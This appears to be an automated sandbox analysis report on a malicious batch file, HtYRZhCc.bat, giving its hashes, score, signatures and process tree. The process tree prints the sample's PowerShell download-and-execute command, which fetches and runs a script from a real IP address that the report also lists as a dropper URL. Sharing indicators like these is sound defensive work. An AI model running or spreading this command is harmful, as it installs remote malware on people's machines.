Analysis
- max time kernel: 105s
- max time network: 142s
- platform: windows10_x64
- resource: win10v200217
- submitted: 01-03-2020 04:10
Static task: static1

Behavioral task: behavioral1
- Sample: HtYRZhCc.bat
- Resource: win7v200217 (windows7_x64)
- 0 signatures
- 0 seconds

Behavioral task: behavioral2
- Sample: HtYRZhCc.bat
- Resource: win10v200217 (windows10_x64)
- 0 signatures
- 0 seconds
General
- Target: HtYRZhCc.bat
- Size: 189B
- MD5: d0eafb36abcfd1c15e9bef86bcf280b0
- SHA1: c4c71e785acaa2543c8ff32db8dbbf49761b78dd
- SHA256: 2f8423a9b51942cea3d3e71e185c4e5780a8dc51cfc5fc0d84d08ad9efe067a5
- SHA512: f75e1a19ca43ab9fbb7e99cdebce8ceca51922258cff04724e811eecfee88a050b1c496580a498ecc845c67abf7ce14b37bf80c0f4fd9d5c300d4bff1b8c9cd5
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source URLs (ps1.dropper): http://185.103.242.78/pastes/HtYRZhCc
Signatures

- Program crash (1 IoC)
  Processes:
  pid  | pid_target | process      | target process
  3524 | 4056       | WerFault.exe | powershell.exe

- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  description               | pid  | process
  Token: SeRestorePrivilege | 3524 | WerFault.exe
  Token: SeBackupPrivilege  | 3524 | WerFault.exe
  Token: SeDebugPrivilege   | 3524 | WerFault.exe

- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
  pid  | process
  3524 | WerFault.exe (this row is reported 14 times)
Processes

- [1] C:\Windows\system32\cmd.exe (PID: 4020)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\HtYRZhCc.bat"

  - [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 4056)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/HtYRZhCc');Invoke-HELKUY;Start-Sleep -s 10000"

    - [3] C:\Windows\SysWOW64\WerFault.exe (PID: 3524)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 704
      Signatures:
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses